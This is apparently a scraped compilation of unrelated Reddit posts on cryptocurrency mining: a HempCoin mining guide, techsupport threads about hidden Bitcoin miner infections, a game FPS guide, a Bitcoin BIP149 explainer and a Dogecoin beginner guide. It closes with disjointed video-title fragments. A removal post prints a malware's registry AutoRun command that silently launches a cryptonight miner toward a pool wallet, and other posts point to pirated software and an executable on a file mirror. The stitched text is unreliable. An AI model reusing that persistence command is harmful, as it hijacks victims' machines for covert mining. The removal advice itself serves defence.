Mac: At the moment, our current wallet only supports the Windows platform. Once we complete our fork there will be a wallet available for all platforms including mac an Linux. So, if you do not have access to a Windows PC your best option for securely storing your coins during our fork is to store them on Bittrex. They have confirmed with the team that they will be supporting the fork so your coins will be safe with them.
Linux: As you may have read above, our wallet currently only officially supports the Windows platform at the moment, however, there have been users who have reported that they have been successful in installing the wallet on Linux. However, at the time, we do not officially support the platform. Our advice would be the same as provided to the Mac users, storing your coins on bittrex would be the best option until our Linux wallet is available.
Android: Currently, the only wallet we know of that will support THC on android is Coinomi. The community has been asking on their support forum if they will be supporting the fork and the reply that was received was somewhat unsure. They stated that no coins will be lost, but never confirmed if they would be adapting to the new algo and giving out any new coins. As the team, we have not heard whether or not they will be supporting the fork so the best plan for android users would be to either transfer your coins to a windows wallet, or to bittrex to ensure you are supported. We are not saying coinomi will not support the fork, however, it is an unknown, and we would prefer to ensure that there is 100% support.
 
Mining Guide:
Lately, we have seen quite a few inquiries about the possibility of mining THC. Currently, there is only one pool that we are aware of which is hosted on the mining-dutch.nl. The tutorial written below will cover how to get started mining with an NVIDIA GPU using the mining-dutch servers, on a Windows-based PC. AMD GPU's have a very similar process, the main difference will be that you need to swap out the program CCMiner for a program which supports the AMD architecture.
To start mining you'll need a few things:
  • A decent GPU (as many as possible really, these are the brains of the operation).
  • A fairly well-ventilated PC case(if you're just mining with your gaming PC)
  • Instead of a PC case a lot of big-time miners just use shelves and build the multi-GPU rigs on those.
  • A mining program (For this tutorial we will be using CCMiner but there are plenty of great alternatives out there too)
  • A pool to mine from (Think of this as a meeting place for all the GPUs to team up and mine faster)
Now that we know what we need to mine, let's get started on setting it up:
  1. Download the correct version of CCMiner: CCminer for 32bit systems or CCminer for 64bit systems (both of these files are just pulled straight from the github).
  2. You may need to install a program to open 7z files such as WinRar.
  3. Extract these files to somewhere like C:\Program Files, or at least somewhere you won't forget about them.
  4. You should see an api folder, a program called ccminer.exe (sometimes ccminer-x64.exe) and a few other small files. What you want to look for is ccminer.conf, this is your config file. You use this to tell your program what pool to mine from.
  5. Open up ccminer.conf with notepad or notepad++ if you have it installed (or really any other coding software) and now we can get to the file editing.
  6. When you open ccminer.conf you should see something that looks like this. (excuse the pastebin link, reddit doesnt seem to like code in lists.)
  7. Next, go to the mining-dutch link and setup an account. (Direct link to signup page)\
  8. (These next links will likely only work once you register and sign in)
  9. Proceed to the workers page (Normally found under My Account>My Workers)
  10. A worker is essentially telling the pool what machine is working for you. Create a new worker by entering in "Workername" "Password" and check the monitor box. Now just hit create.
  11. Now, go back to the ccminer.conf file that we opened earlier. If you follow this link you should see something that looks very much like your file, however, it also has labels, #1, #2, #3.
  12. On your file, fill in #1 with "stratum+tcp://mining-dutch.nl:3435" (this can be found on the mining dutch website, its just hidden. In the top right, click the cloud with the blue icon (getting started) then scroll down to the Vardiff address for Hempcoin)
  13. #2, enter your "loginname.workername" Login name being your username to login to mining-dutch, then workername being what you just named the worker we created.
  14. #3 can be filled with anything, they don't use passwords.
  15. This should really be all you need. Now save the ccminer.conf and then just run ccminer.exe
If all of this was done correctly you should see a command-prompt window pop up and your machine start to mine. It takes some time to get going so that is not unheard of, and also, if you look at the dashboard you may not see your worker show up for a while. This is normal, it uses averages over time to tell you what performance it is getting so it won't have a proper value for a few minutes.
 

Current Projects

We are always working on advancing all of our roadmap goals, however, lately, we have been focusing on a few key projects which are listed below (in no specific order).
  • Putting the finishing touches on the new wallet.
  • Ensuring bittrex is ready for the fork.
  • HempPay.
  • Merchant Services
  • Our mobile app
  • Graphics that will better represent the new THC.
  • A brand new website (launching soon!).
  • Connecting with many different owners/affiliates/partners to businesses which would like to use THC locally.
  • Implementing the ambassador program
  • Internal organization to ensure everyone is on the same page at all times.
 

Social Platform Links

One of the larger changes we have made is to bring a community outreach manager onboard to work on communication. We may have had missteps in the past, however that is in the past, we have changed and want to ensure we show you that change! Keeping in line with that, we have heard your cries for a more community-oriented social stance, so, we have created an official discord chatroom where anyone can come and chat with some of the devs, or the rest of the community to stay in the loop. We have also created a telegram more recently, which as of the date of typing this, has over 1000 members already, and it was only released less than a week ago. We do ask that everyone who joins reads over the rules that are posted in both locations and abides by them so we can have a clean and organized community. We are always looking to expand and if you have any more suggestions feel free to let us know!
 

F.A.Q's

Q: I transferred X amount of THC to my wallet, but it's missing? A: The first step to ensuring you never lose any THC is to confirm the wallet address. Always, always, always double and triple-check that the address you input is the same as your address. If there are ANY typos at all, you will not receive your coins. If you have checked and are sure that the address is correct, check your wallet. If you have just installed it, chances are you are still syncing with the blockchain; you will need to wait until you are caught up to see the THC. It's best practice to sync your wallet before you make any transfers. To check the status of your synchronization, check the debug menu in the wallet, it will show you the exact date you are synced to. Lastly, if you are for sure synced, and you have used the correct address, check the transaction ID on the block explorer. This will show what happened with the transaction and allow you to follow where it went. It could also still just be in progress, sometimes it can take up to an hour if there are service delays with the exchange or even just your internet connection.
Q: Why have there been so many delays with THC? You have been around forever! A: Although THC was one of the first 30 cryptocurrencies mined in 2014, the unfortunate truth is that before April 2017, there was no active full-time team. Since then, the original THC FoundeDeveloper and current CEO Tim has worked hard to add incredible new developers, a business outreach team, an entire marketing team, and the brand ambassadorship program. It has taken us a little time to organize, but we are finally in sync as a team and prepared to unleash this business on the world.
Q: When is the fork? A: As many of you have noticed, our whitepaper says fork will occur by Q2, while we previously announced Feb. 23rd. We did this not to provide our community with doubts, but to allow ourselves an added bit of time for our dev team which, like the rest of our team, has added new members in recent months. Due to this, we are far further along with our HempPay platform than we thought possible; as such we will be hiring 3rd party code auditor to audit our code to ensure we run as smoothly as possible. We would much rather delay a fork than risk any of our investor's privacy or security and fork too early. We also want to reiterate that we have a direct line with Bittrex and they will 100% support our fork. We do appreciate everyone’s patience with this transition into the future of THC; we’re working hard to ensure that we fork as early as possible.
Q: Will Bittrex be supporting the fork? A: We have seen this question come up many times now and the answer is, and will always be, yes. Bittrex is well aware of our plans and they know exactly where we stand regarding the fork date. Bittrex has also asked requested our community stop creating support tickets just to confirm the fork. They have been overwhelmed this week with the same question over and over. The final answer here is yes, Bittrex will be supporting the fork and we are in constant contact with them to ensure everything is going as planned.
Q: Will purchases with a credit card to HempPay count as cash advances? A: We are still in the middle stages of building HempPay and finalizing the format for operation and contractual agreements. We intend to partner with exchanges and use their API to make the purchases, so buying THC through our app will have the same effect as using your card to purchase straight from an exchange. Please note that HempPay is still in development so exact details may be subject to change.
Q: What is the cost for a masternode? Some say 10,000 others say 20,000 THC is required. A: To run a masternode, 20,000 THC will be required. We do acknowledge that during our transition, we had originally stated 20,000 and then our team announced 10,000 THC will be required. We have since readjusted our plan, realizing that the low requirement would sink MN profits and lower incentive. Instead, we returned the requirement to 20,000 THC and increased the node reward by 66%. For more information please check the masternode calculator in the Tools section.
Q: I heard Bittrex may delist THC. What?? A: Short answer: No and not even close. Long answer: This rumour was started over a year ago, it was based on a Bittrex Support post from January 27th, 2017. The only post we appear in is the one mentioned above. You will also see that we only appear due to being listed as a potential for removal, due to a lack of volume as most altcoins saw at that time. You will note the size of the list of altcoins here. We are now in direct communication with Bittrex daily and we unequivocally state that there is no need to worry about us being removed at all.
submitted by zacharyd3 to thehempcoin [link] [comments]

Keep Your Eyes Out For Bitcoin Miners | Windows (R) Contacts Import Tool [wabmig.exe] (x-post r/pcgaming)

Even though this is a specific case, hopefully it serves nonetheless as a reminder for those of you who sail the high seas. Check your GPU and CPU usage for any strange activity (Bitcoin miners), as sometimes scans from Windows Defender and even Malwarebytes can miss them.
Noticed your games and PC in general performing slowly lately? For me, it was a decrease in frames and stuttering exactly every second, for my friend it decreased her performance significantly and put her GPU usage up to 90% constantly.
It appeared as a process in Task Manager using 30% of my CPU: Microsoft (R) Contacts Import Tool. Upon killing it our GPU usage went down to idle and as did our CPU usage. Upon further investigation I found it as a file (wabmig.exe) in a folder called Windows Mail. Now here's the weird thing, it was in my Riot Games folder in AppData, right alongside League of Legends. The removal is fairly simple: kill the process and delete the folder (empty your recycle bin too!).
Now of course this just screams Bitcoin miner, so I scanned it with Malwarebytes and Defender... nothing. However, scanning it with VirusTotal revealed this. Here you can see an analysis of the entire Windows Mail folder we found. We had been installing things from the high seas, so to speak, so it most certainly came from that. I couldn't pinpoint which installer contained the miner but they were all fairly popular things. If you're flying the black flag, keep an eye on your usages.
I understand this might be a strange place to post something like this, and no, I'm not going to sit here and say "oh I didn't do anything dangerous" etc., however I've had a lot of experience at sea and yet I still got caught out. I think it's important for everyone to remember that Bitcoin miners can happen to even the more secure of us.
tl;dr - If your games have become sluggish out of nowhere, you could have a Bitcoin miner. Be safe when sailing the seven seas.
submitted by TheXRTD to techsupport [link] [comments]

At my wit's end with virus removal

So I have at least one virus on my computer. The one I know of is some sort of bitcoin miner, I know this because my gpu usage is constantly at 100% and the fan goes crazy as well as hitmanpro categorizing files with names like bitcoinminer.
I have managed to remove every suspicious file I could find and ran antivirus and antimalware until they couldn't detect anything else but the virus keeps coming back.
The main places I think the virus is focused around are the ~C:\Users\Tony\AppData\Local\Temp~ and ~C:\Users\Tony\AppData\Local\WinSXS~ folders.
I have booted into safe mode, deleted everything in the temp folder, and gave myself permission to delete the WinSXS folder. Every time I boot normally the WinSXS folder just comes back. I know something is up with this folder because rkill always terminates it as well as the other antimalware not liking it.
When I normally boot there is a folder in the temp folder with a name that's just random strings of numbers and letters that I can't delete. It says it's open in another program. I searched the folder name is the resource monitor cpu tab and it was associated with svchost.exe and a couple other things. I'm wondering is the virus is somehow tied to svchost.
So here's a rundown of the steps I've been taking (repeatedly) to try to take care of this.
  1. Boot into safe mode (by switching my psu off then on to get to the boot menu)
  2. Show hidden files and folders
  3. Delete everything from the local\temp folder
  4. Delete unknown files from C:\\ProgramData and C:\Users\User\AppData\Roaming
  5. Remove any weird keys from HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  6. Empty Recycle Bin
  7. Run rkill
  8. Run adwcleaner
  9. Run malwarebytes (with rootkit checker)
  10. Run Hitmanpro
  11. Run combofix
  12. Run the trojan remover from https://www.simplysup.com/
  13. Reboot computer normally
  14. Run malwarebytes, watch as it finds the same walwares as a million times before
  15. Listen to my fan speed fluctuate like crazy
  16. Run rkill, it kills a WinSXS process, which does nothing
  17. Cry uncontrollably
So uh, what the hell should I do?
OS: Windows 7
submitted by Froggyfrogger to techsupport [link] [comments]

Guide to getting more FPS. Some simple stuff and random tricks I found to work.

EDIT: IF YOU WERE GETTING THE DXGI.DLL FILE ERROR PLEASE DOWNLOAD RESHADE v3.1.1 HERE http://www.mediafire.com/file/h3b0l50e8dsv8j3/ReShade_Setup_3.1.1.exe AND REINSTALL THEN YOU SHOULD BE ABLE TO USE RESHADE
I decided to make an FPS guide for people struggling to keep their FPS up. There is a ton of stuff you can do to get FPS but the more you do the worse the game will look. It includes simple stuff like editing config files as well as doing stuff like running the game in DirectX10 and dropping your resolution scaling for decent FPS boosts and then using Reshade to get the visual quality back while holding onto the FPS gains. I was able to get about an extra 70-100 fps on average depending on the map doing the stuff below. Here are before and after screenshots:
Here are my computer specs as a reference which is on the higher end with the exception of my videocard (suck a dick bitcoin miners): https://i.imgur.com/TE1whwN.png
Most of the FPS issues with the game stem from how the game is rendering textures so anything you can do to have less and less visible textures the more your FPS will inscrease.
Before you dive into this guide it is probably wise to .zip/.rar any config files you want to save incase you goof something up or just dont like what it looks like.
First, obviously turn everything you can to low in the videosettings. Here is an example of the FPS increase just from having the video settings changed from Ultra to Low.
From here on out all the screenshots will show the FPS with the video settings set to low.
Within your "custom.config" there are a few settings that you can change even though there is no menu option to do so. Your custom config settings can be found at "C:\Program Files (x86)\Steam\steamapps\common\Battalion 1944\Battalion\configs\custom". Here is a link to my current custom.config file:
It may not include EVERYTHING that can be changed since I very well may miss some stuff but it is what I am currently playing with. If you edit this file manually you must maintain the syntax exactly. Things can be added and removed but If you do not have every command in there formatted EXACTLY as "shadowQuality": 0, then your config file will not work and the game will launch with all sorts of fucked up settings.
In the menu settings, just create a new custom.config file (itll show as custom1.config or custom2.config etc within your steamapps\common\Battalion 1944\Battalion\configs\custom folder as im sure most of you know), open it up and then copy/paste my config settings into it. You will have to change your resolution, mouse settings etc. Here are screenshots to show the FPS gains going from stock ultra settings to low settings and now just a few config file edits almost doubling my own FPS:
So that more or less ends the simple .ini/config editing for more FPS. From what I can tell, the Engine.ini and other .ini files can no longer be fully edited to do stuff like increase lodbias and edit lighting/shadows fully to do anything like this https://i.imgur.com/echGUwf.jpg anymore. That config was done entirely by editing the .ini files but alas, I think the devs locked it all up.
If you are REALLY struggling with FPS here are a few tricks that may help you squeeze out a little bit more performance while also increasing visibility depending on the settings you use.
You can force the game to run in DirectX10. Doing so can increase your FPS but also potentially make your game dark as hell. I will address that in a bit.
The FPS increase in training doesnt look like much compared to how fucking awful it may look to some of you but while playing online it maintain your FPS at a higher level due to not fully rendering everything as it would if you run in DirectX11. Especially in busier servers/maps. But as you can see you get even more FPS.
What I have done to counteract the lack of lighting is install Reshade and enable some of the filters to brighten the game up as seen here:
You MUST download and install Reshade version 3.1.1 or earlier. The latest version of Reshade apparently doesnt not work with Battalion. To do this download Reshade here http://www.mediafire.com/file/h3b0l50e8dsv8j3/ReShade_Setup_3.1.1.exe and do the following:
Another thing you can do with Reshade is lower your game resolution or resolution quality to get an FPS boost. It will make your game look like dogshit depending on how low you set it. However you can get clarity and sharpness back through Reshade options. Here are a couple of screenshots of my game with a resolution quality of 75 @ 1920x1080 with Reshade disabled and then enabled.
From the screenshots it may look like there isnt much different in clarity or the game is unplayable but once you join a server I find it to work well. Depending on your system this can be ALL over the place as far as results go but if you tinker with the filters and game settings you should be able to squeeze some more FPS out.
There isnt much more I have been able to find without making the game graphics more or less unplayable. If I can figure out how to edit more .ini comands I will update this post, however I think the devs locked up the majority of the Cvars.
Hope this works for you goobers!
EDIT: Im still working on configs through .ini editing so as I find more stuff Ill update the top this post to reflect the changes.
Testimonials:
berry` - Today at 10:06 AM
you sir are a fucking god
idk what the fuck is in your config but my game runs smooth as fuck
like i didnt need the fps
BUT HOLY FUCK i dont stutter at all lol
youre the man
submitted by Usurp to Battalion1944 [link] [comments]

TO ANYONE WHO DOWNLOADED THE "3DM REPACK" OF SHADOW OF WAR ON TPB

The 3DM repack available on the PirateBay is a bitcoin miner. You can find out by trying to open cmd if you've been infected or not. It closes the command prompt instantly. Here's how we removed it.
First, close it out in the task manager. Its called Soundmixer.exe Next, appdata - roaming - microsoft- soundmixer. Delete the whole folder.
There'll be one or both of these entries in your registry.
--DELETE THEM BOTH IF THEY APPEAR--
[HKEY_CURRENT_USER\Software\Microsoft\Command Processor] "AutoRun"="@mode 15,1 & start /MIN "" >"C:\Users\PC\AppData\Roaming\Microsoft\SoundMixer\SoundMixer.exe" -a cryptonight -o stratum+tcp://pool.minexmr.com:80 -u 4AQLzBQYq7nHAhtwjXb2XZZikWknhqxzmAgNvRkPrKW3Kp7nn3XrkaHh22L8r8B6s2ezjPtye76YqQoFqdeJTxvqGQWRoBy+10000 -p x -k -t 1 -B & explorer.exe & exit"
[HKEY_USERS\S-1-5-21-4215818013-1387844859-1192221006-1001\Software\Microsoft\Command Processor] "AutoRun"="@mode 15,1 & start /MIN "" "C:\Users\PC\AppData\Roaming\Microsoft\SoundMixer\SoundMixer.exe" -a cryptonight -o stratum+tcp://pool.minexmr.com:80 -u 4AQLzBQYq7nHAhtwjXb2XZZikWknhqxzmAgNvRkPrKW3Kp7nn3XrkaHh22L8r8B6s2ezjPtye76YqQoFqdeJTxvqGQWRoBy+10000 -p x -k -t 1 -B & explorer.exe & exit"
The first part after the path is the entry you need to delete. Thats what it contains.
And there's one at HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon - - Keyword is Shell. Change it back to Explorer.exe instead of %conf% or whatever it is.
submitted by Kainen to CrackSupport [link] [comments]

Understanding BIP149, redeployment of Segwit with BIP8

I recently published BIP149 and would like to take a few moments to explain the details of this proposal.
BIP149 is a completely new deployment of segwit, which I propose if the current BIP9/BIP141/143/147 segwit deployment fails to lockin/activate by November 15th.
BIP149 cannot be run on mainnet now, and there is code in the reference implementation to prevent it from running. It is incompatible with the current segwit deployment on purpose to remove unnecessary complications.
Essentially, the idea is, if the current segwit deployment fails to activate by Nov 15th, we can release new software that has BIP149. This uses BIP8 to activate segwit by July 2018. Miners will still be able to trigger activation by 95% threshold signalling as normal. In the 8 months from November to July 2018, nodes will be able to upgrade to BIP149. If segwit is not MASF activated by July 2018, there will be enough of the economy running BIP149 that nodes can begin enforcement. What will actually happen is on the first retarget after July 4th, the BIP8 state machine will switch to LOCKED_IN status for two weeks, and then on the following retarget, ACTIVATION will occur. The rationale here is in 5 months we achieved 70% saturation of witness capable nodes, so by the time segwit timesout with all the urgency and demand people feel for segwit, we can expect them to upgrade at least as fast, if not much faster. I have spoken with a number of developers who think this is a reasonable assumption.
Background, I had hoped to be able to release a BIP that can be deployed concurrently now with segwit, but, there are various technical complications in implementing it cleanly and making it easily reviewable. I had various feedback from others in previous iterations and in order to get the widest support from developers especially concerned with predictable results and thus safety, I came to the conclusion that the BIP will get the widest support by not attempting any shortcuts and by removing all complexity. I know many people want segwit now, but, I think we should just bite the bullet and do it the BIP149 way. I already made a shortcut BIP with BIP148. I will discuss the pros and cons at the end.
Back to BIP149, this is a completely new redeployment with a new service bit NODE_UAWITNESS and new compact block protocol version - doing this avoids many gotchyas which I will explain below:
Currently, segwit capable nodes advertize the NODE_WITNESS service bit and preferentially peer with other NODE_WITNESS nodes. Post activation, segwit-active nodes will then know who they should relay witness blocks to and who they should relay old style stripped blocks to. The assumption is if I am a NODE_WITNESS node and segwit has activated, then other NODE_WITNESS nodes will also be segwit activated. We cannot reuse NODE_WITNESS because when BIP149 activates, they would believe non-BIP149 NODE_WITNESS nodes were also active. Using a new service bit, and effectively starting a new deployment as if the previous deployment doesnt exist, is the most predictable and trouble free way to go about it.
Additionally, BIP149 is compatible with existing mining software by reusing the "segwit" name and deployment chainparams (it's not possible to have two deployments with the same name, one expired and one pending/active, due to how versionbits is implemented). In short, if the current segwit deployment fails to activate, we can reuse parts to maintain compatibility, while changing the bare minimum to remove any conflicts with old nodes. It's clean, predictable and easy to review.
BIP148 IS NOT BIP149
Remember BIP148 is exceptional, it's NOT what a usual UASF BIP should look like. A normal UASF if effectively activation on a predetermined date in the future (a flag day). BIP8 combines BIP9 miner signalling with a flagday if MASF does not occur.
How is BIP149 different to BIP148? So BIP148 is a UASF which can be used in two ways. (a) The economy can run BIP148 and basically force miners to signal for segwit, thus activating the current segwit deployment. Or, (b) a majority of miners, 60% or so, could run it and censor other miners who do not signal segwit, thus causing the current segwit to deploy. In method (a) a chain split will occur if any miners do not upgrade, and given the fact there are always absentee miners and pool operators, this is quite likely. It's the economy vs hash power saying "if you dont signal, your blocks will not be worth anything because we will reject them". In the case of (b) you have a majority of hashpower, who could use their majority to orphan any non signalling miners. This isn't great but it's less disruptive than (a) because there is a majority hashpower definitely opted in.
BIP149 on the other had does not guarantee a chain split since that could only happen if a miner deliberately takes action to manually create a segwit invalid block, which would be rejected by the economy. The incentives are different also, with BIP148 a chainsplit comes for free, regardless of if it lasts long or not. In BIP149, a miner would have to specifically take action to split and waste their money, which they could do at any time anyway. BIP149 is uncontroversial in the sense it is just a redeployment with guaranteed activation at the end, for a soft fork we are fairly sure people want and will upgrade to. The evidence is everywhere. UASFs deployed over a long time and a decent flagday are perfectly safe - all soft forks are enforced by nodes, even if activation is triggered by hashpower.
Anyway, we've got 8 months from now to review and think about BIP149 - it cannot be deployed until November. If you would like to show support for BIP149, feel free to add the following to your bitcoin.conf
uacomment=UASF-SegWit-BIP149 
Note you can have multiple uacomments like:
uacomment=BIP8 uacomment=UASF-SegWit-BIP149 uacomment=UASF-SegWit-BIP148 
You can find the bitcoin.conf file here
You can also just add this to a shortcut - create a shortcut (or edit the existing one you use) and add this to the end: -uacomment=UASF-SegWit-BIP149
e.g. (just add the property to the end like this):
"C:\Program Files\Bitcoin\bitcoin-qt.exe" -uacomment=UASF-SegWit-BIP149 if you are using Windows.
You can also just add uacomments as multiple command line/shortcut arguments like
-uacomment=BIP8 -uacomment=UASF-SegWit-BIP149 -uacomment=UASF-SegWit-BIP148 
Then you can check here to see how your node is signalling at https://bitnodes.21.co/ will show something like: xxx.xxx.xxx.xxx:8333 /Satoshi:0.14.1(UASF-SegWit-BIP149)/
If your node has synced and doesn't show using the link above make sure to enable forwarding of port 8333 so you accept incoming connections (if you want to that is) - in your client: go into settings / network and tick enable incoming connections and use upnp. You might have to add it to your firewall if this doesn't work. [taken from this user comment].
Read the BIP https://github.com/bitcoin/bips/blob/mastebip-0149.mediawiki
See the implementation https://github.com/bitcoin/bitcoin/compare/master...shaolinfry:uasegwit-flagday
submitted by shaolinfry to Bitcoin [link] [comments]

such beginner shibe thread wow how to get coin

 how to shibecoin v rich in minutes much instruct so simple any doge can do 

START HERE

UPDATE 1/21/14: I'm not updating this guide anymore. Most of the steps should still work though. See the wiki or check the sidebar for updated instructions.
Before you do anything else, you need to get a wallet. Until there's a secure online wallet, this means you need to download the dogecoin client.
Now open the client you just downloaded. You'll be given a default address automatically, and it should connect to peers and start downloading the dogechain (aka blockchain in formal speak). You'll know because there will be a progress bar at the bottom and at the lower right there should be a signal strength icon (TODO: add screenshots).
If you've waited 2 or 3 minutes and nothing is happening, copy this:
maxconnections=100 addnode=95.85.29.144 addnode=162.243.113.110 addnode=146.185.181.114 addnode=188.165.19.28 addnode=166.78.155.36 addnode=doge.scryptpools.com addnode=doge.netcodepool.org addnode=doge.pool.webxass.de addnode=doge.cryptopool.it addnode=pool.testserverino.de addnode=doge.luckyminers.com addnode=doge.cryptovalley.com addnode=miner.coinedup.comdoge addnode=doge.cryptoculture.net addnode=dogepool.pw addnode=doge.gentoomen.org addnode=doge.cryptominer.net addnode=67.205.20.10 addnode=162.243.113.110 addnode=78.46.57.132 
And paste it into a new text file called dogecoin.conf, which you then place into the dogecoin app directory.
Now restart your qt client and the blockchain should start downloading in about 1-2 minutes.
Once it finished downloading, you're ready to send and receive Dogecoins!

GETTING COINS

Decide how you want to get Dogecoin. Your options are:
I'll go into detail about each of these. I'm currently writing this out. I'll make edits as I add sections. Suggestions are welcome.

MINING

Mining is how new dogecoins are created. If you're new to crypto currencies, read this. To mine (also called "digging"), a computer with a decent GPU (graphics card) is recommended. You can also mine with your CPU, but it's not as efficient.

GPU MINING

These instructions cover only Windows for now. To mine, you'll need to figure out what GPU you have. It'll be either AMD/ATI or Nvidia. The setup for both is approximately the same.

Step One: Choose a pool

There's a list of pools on the wiki. For now it doesn't really matter which one you choose. You can easily switch later.
NOTE: You can mine in two ways. Solo mining is where you mine by yourself. When you find a block you get all the reward. Pool mining is when you team up with other miners to work on the same block together. This makes it more likely that you'll find a block, but you won't get all of it, you'll have to split it up with others according to your share of the work. Pool mining is recommended because it gives you frequent payouts, because you find more blocks. The larger the pool you join, the more frequent the payouts, but the smaller the reward you get.
Over a long period of time the difference between pool and solo mining goes away, but if you solo mine it might be months before you get any coins.

Step two: Set up pool account

The pool you chose should have a getting started page. Read it and follow the instructions. Instructions vary but the general idea is:
When you're done with this, you'll need to know:

Step three: Download mining software

For best performance you'll need the right mining software.
Unzip the download anywhere you want.

Step four: Set up miner

Create a text file in the same folder as your miner application. Inside, put the command you'll be running (remove brackets).
For AMD it's cgminer.exe --scrypt -o stratum+tcp://: -u -p
For Nvidia it's cudaminer.exe -o stratum+tcp://: -O :
Substitute the right stuff in for the placeholders. Then on the next line of the text file type pause. This will let you see any errors that you get. Then save the file with any name you want, as long as the file extension is .bat. For example mine_serverName.bat.

Step five: Launch your miner

Just open the .bat file and a command line window should pop up, letting you know that the miner is starting. Once it starts, it should print out your hash rate.
If you now go to the pool website, the dashboard should start showing your hashrate. At first it'll be lower than what it says in the miner, but that's because the dashboard is taking a 5 minute average. It'll catch up soon enough.
NOTE: A normal hashrate is between 50 Kh/s up to even 1 Mh/s depending on your GPU.

You're now mining Dogecoins

That's it, nothing more to it.

CPU MINING

CPU mining isn't really recommended, because you'll be spending a lot on more on power than you'd make from mining Dogecoin. You could better spend that money on buying Dogecoin by trading. But if you have free electricity and want to try it out, check out this informative forum post.

Trading

Trading has been difficult so far, but Dogecoin just got added to a few new exchanges. If you don't have a giant mining rig, this is probably the best way to get 100k or more dogecoins at the moment. I'll write up a more complete guide, but for now check out these sites:

Faucets

Faucets are sites that give out free coins. Usually a site will give out somewhere between 1 and 100 Dogecoin. Every site has its own time limits, but usually you can only receive coins once every few hours, or in some cases, days. It's a great way to get started. All you do is copy your address from the receive section of your wallet and enter it on some faucet sites. Check out /dogecoinfaucets for more. If you go to each site on there you might end up with a couple hundred Dogecoin!

Begging

This method is pretty straightforward. Post your receiving address, and ask for some coins. Such poor shibe. The only catch is, don't do it here! Please go to /dogecoinbeg.

Tips

At the moment there are two tip bots:
Other redditors can give you Dogecoin by summoning the tip bot, something like this:
+dogetipbot 5 doge
This might happen if you make a good post, or someone just wants to give out some coins. Once you receive a tip you have to accept it in a few days or else it'll get returned. Do this by following the instructions on the message you receive in your inbox. You reply to the bot with "+accept". Commands go in the message body. Once you do that, the bot will create a tipping address for you, and you can use the links in the message you receive to see your info, withdraw coins to your dogecoin-qt wallet, see your history, and a bunch of other stuff.
As a bonus, so_doge_tip has a feature where you can get some Dogecoins to start with in exchange for how much karma you have. To do this, send the message "+redeem DOGE" to so_doge_tip. You'll need to create a tipping account if you don't have one.
If you want to create a tipping account without ever being tipped first, message either of the bots with "+register" and an address will be created for you.

CHANGELOG

  • 1/21/14 - Added note about this thread no longer being updated
  • 1/21/14 - Changed wallet links to official site
  • 12/27/13 - Added 1.3 wallet-qt links
  • 12/21/13 - Added new windows 1.2 wallet link
  • 12/20/13 - Fixed +redeem text
  • 12/18/13 - Added short blurb on trading.
  • 12/18/13 - Updated cudaminer to new version (cudaminer-2013-12-18.zip).
  • 12/18/13 - Fixed +redeem link
  • 12/18/13 - Updates dogecoin.conf, from here.
  • 12/17/13 - Linked to mining explanation.
  • 12/17/13 - Added link to CPU mining tutorial, in response to this.
  • 12/16/13 - Added links to tip commands, link to dogetipbot wiki.
  • 12/16/13 - Note about tip commands going in body, in response to this.
  • 12/16/13 - Added link to cgminer mirror, thanks to scubasteve812 and thanks to Bagrisham.
  • 12/16/13 - Note about removing brackets in response to this.
  • 12/15/13 - Fixed hash rate as per this comment, thanks lleti
  • 12/15/13 - Added info for all other ways of getting money, except for trading (placeholder for now)
  • 12/15/13 - Added windows GPU mining instructions 12/15/13 - Added wallet instructions, list of how to get money
submitted by lego-banana to dogecoin [link] [comments]

How to Remove BitcoinMiner How to Find and Remove a Hidden Miner Virus on Your PC 🐛🛡️🖥️ How to Remove BitcoinMiner Malware from Your PC How To Remove Fatality Crack Miner! Como Remover CoinMiner do PC

How to Remove BitCoinMiner from the Windows Registry ^. The Windows registry stores important system information such as system preferences, user settings and installed programs details as well as the information about the applications that are automatically run at start-up. How to Remove the Cryptocurrency Miner Malware. Here are the steps you need to follow for getting rid of Bitcoin miner malware from your device: Step 1: Manually removing it from the “Installed Programs Tab” This is probably one of the simplest ways to remove the malware. To start off, you will first have to open the control panel. This article will help you to remove Miner.exe totally. Follow the removal instructions for the miner malware provided at the end of the article. Miner.exe is the name of an executable process. The process is most widely known as Chrome M1N3R and belongs to the software application “Chrome M1N3R” developed by Kibernetika LTD or CM. What Is Bitcoin Miner Virus? As ransomware attacks become more frequent than ever, making the Bitcoin price to rise, the need for a Bitcoin miner virus also increases. Malware actors try to implement a Bitcoin mining virus into everything they do, be it backdoors, viruses, ransomware, adware and redirects. When Trojan.BitcoinMiner is detected with a scan of Malwarebytes Anti-Malware your computer is infected with a Trojan horse. Once the Trojan.BitcoinMiner infected the target PC, it will use various ways to protect itself from being removed. This malware is designed by cybercriminals to use the GPU and CPU power to mine bitcoins on the infected system without your knowledge.

[index] [13909] [32774] [21705] [21566] [261] [32612] [10623] [16735] [24973] [3994]

How to Remove BitcoinMiner

BitcoinMiner is a Malware that was designed to force your computer to mine crypto-currency that is called Bitcoin. When the Bitcoins have been mined on the computer’s system, the designer of ... Bitcoin Miner Malware Incredibly Stealthy! ... How to diagnose and remove a bitcoin miner trojan - Duration: 4:57. ... Win32/CoinMiner Virus Manually ( SYS64/Starter.exe and Driver.exe ... 👍 Watch how to remove a hidden Bitcoin mining virus from your computer. If you noticed that your computer – while you’re not using it - still behaves as if i... How to diagnose and remove a bitcoin miner trojan - Duration: 4:57. EZOVERDOSE 182,342 views. 4:57. How to Remove Malware and Adware for Free 2015 Guide - Duration: 1:00:19. Program:Win32/CoinMiner being a highly dangerous spyware infection for Windows is a free mining client for Windows which generates new digital coins in the BitCoin decentralized economy by ...

#